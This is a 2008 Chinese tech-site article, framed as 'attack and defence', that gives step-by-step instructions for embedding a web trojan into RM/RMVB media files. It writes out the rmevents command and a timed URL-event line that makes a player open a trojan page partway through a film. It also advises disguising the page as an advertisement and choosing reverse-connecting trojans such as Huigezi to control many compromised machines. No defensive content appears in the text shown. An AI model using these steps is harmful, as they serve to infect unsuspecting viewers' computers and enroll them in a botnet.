今天是:
首 页信息查询网站SEO查询工具CSS编辑器建站素材
网海拾贝,电脑资讯,电脑快报,it资讯,网站建设资讯,教程基地
软件新闻
操作系统
Vista Winxp Win2003 Linux Windows综合
工具软件
系统工具 媒体工具 网络工具 杀毒软件 聊天
软件开发
C教程 C++ Java C# ASP.NET JSP PHP
数据库
Oracle MySQL DB2 SQL Server Sybase
安全
网络 病毒
办公应用
Word Excel Powerpoint Outlook 其他
平面设计
Photoshop Fireworks Coreldraw Flash Illustrator 3dsmax
网站运营
网站运营 网站优化 网站策划 策划书下载 建站心得 站长故事 网站盈利 网页制作 网页特效 建站素材 免费资源 QQ频道
  当前位置:首 页 >> 网络应用 >> 网络安全 >> 危害性更大媒体文件木马攻防实战

危害性更大媒体文件木马攻防实战

  发布于2008-01-07 09:56 来源:网海拾贝

  如今网络上流传最为广泛的媒体文件有两类,一类是RM、RMVB文件,另一类是WMV、WMA文件,由于它们对流媒体的良好支持,使网络上的电影、音乐等媒体文件几乎都采用了这两种媒体文件格式,因此,如果在媒体文件中植入木马,那么媒体文件中木马独有的隐蔽性将会使受害者在不知不觉中被网页木马侵害,危害性可见一斑。

  RM、RMVB中加入木马

  Helix Producer Plus是一款图形化的专业流媒体文件制作工具,我们可以利用Helix Producer Plus这款软件把其他格式的文件转换成RM或RMVB格式,当然也可以对已存在的RM文件进行重新编辑,在编辑的同时,我们可以把事先准备好的网页木马插入其中。这样只要一打开这个编辑好的媒体文件,插入在其中的网页木马也会随之打开,我们甚至还能控制网页木马打开的时间,让网页木马更隐蔽。

  步骤1:首先下载Helix Producer Plus,一路“Next”完成安装,然后我们要找一个能把网页木马插入其中的RM电影文件,把它改名为film.rm,然后拷贝到Helix Producer Plus安装目录的RealMediaEditor文件夹下。

  步骤2:我们在这个文件夹中新建一个文本文档,命名为test.txt,在test.txt文件中写入这样一句命令:“u 00:07:00 00:07:30 http://www.***.com/in

  dex.php”,这句命令的意思是当媒体文件播放到第7分钟后触发打开URL事件,然后到7分30秒的时候事件结束,最后面的就是URL的网址,我们可以把这个网址改成我们的网页木马的地址(关于网页木马的制作和设置已经多次介绍,在此不再重复),这样便可以在别人看媒体文件的时候打开网页木马,让他不知不觉中招(如图1)。

危害性更大媒体文件木马攻防实战1

  小提示:对于制作的网页木马应尽量隐蔽,并模仿正常网页,否则在看媒体文件时突然弹出网页谁都会有疑心,当然把它做成类似的广告网页效果最好,别人会以为是广告,便一关了之,而这时我们已经种马成功了。对于木马的选择应尽量使用具有反向连接的木马,如灰鸽子,否则即使有了上百的肉鸡,一个一个去连接也是很麻烦的。

  步骤3:运行CMD(命令提示符),进入RealMediaEditor文件夹,输入命令:“rmevents -i film.rm -e test.txt -o film2.rm”,这是最关键的一步,意思是利用Helix Producer Plus自带的rmevents.exe把test.txt这个触发URL事件合并到film.rm中,并另存为film2.rm。这个新生成的film2.rm便是我们需要的带有网页木马的媒体文件(如图2)。

危害性更大媒体文件木马攻防实战2




中查找“危害性更大媒体文件木马攻防实战”更多相关内容

中查找“危害性更大媒体文件木马攻防实战”更多相关内容



上一篇:基础知识 黑客域名劫持攻击详细步骤
下一篇:让数据更安全 6招实战EFS加密技巧
最近更新 赞助商
·Wi-Fi无线连接失败原因及解决方法08-27
·预防MP3播放器被病毒感染08-27
·无权限的共享文件夹看不到?08-27
·病毒感染可执行文件后图标模糊的原因02-22
·不怕攻击 家庭上网必学八招安全绝招01-18
·网管秘籍:如何选择安全漏洞扫描工具01-15
·巧妙的化解分布式拒绝服务攻击(DDoS)01-12
·让数据更安全 6招实战EFS加密技巧01-07
·危害性更大媒体文件木马攻防实战01-07
·基础知识 黑客域名劫持攻击详细步骤01-03
·从交换机入手 彻底解决ARP攻击01-02

共有评论 0 条 网友评分 0分 查看所有评论


发表评论→ 学而不思则罔,思而不学则殆,请大胆发表你的见解。

输验证码:

您对此篇文章的评分:1分 2分 3分 4分 5分

  • 站内搜索
关键词

搜索方式

搜索范围

精确匹配
Baidu
网站首页 - 关于本站 - 网站地图 - 广告合作 - 站点声明 - RSS订阅 - 联系我们
Copyright © 2005 网海拾贝.[新ICP备05003216号]. All Rights Reserved .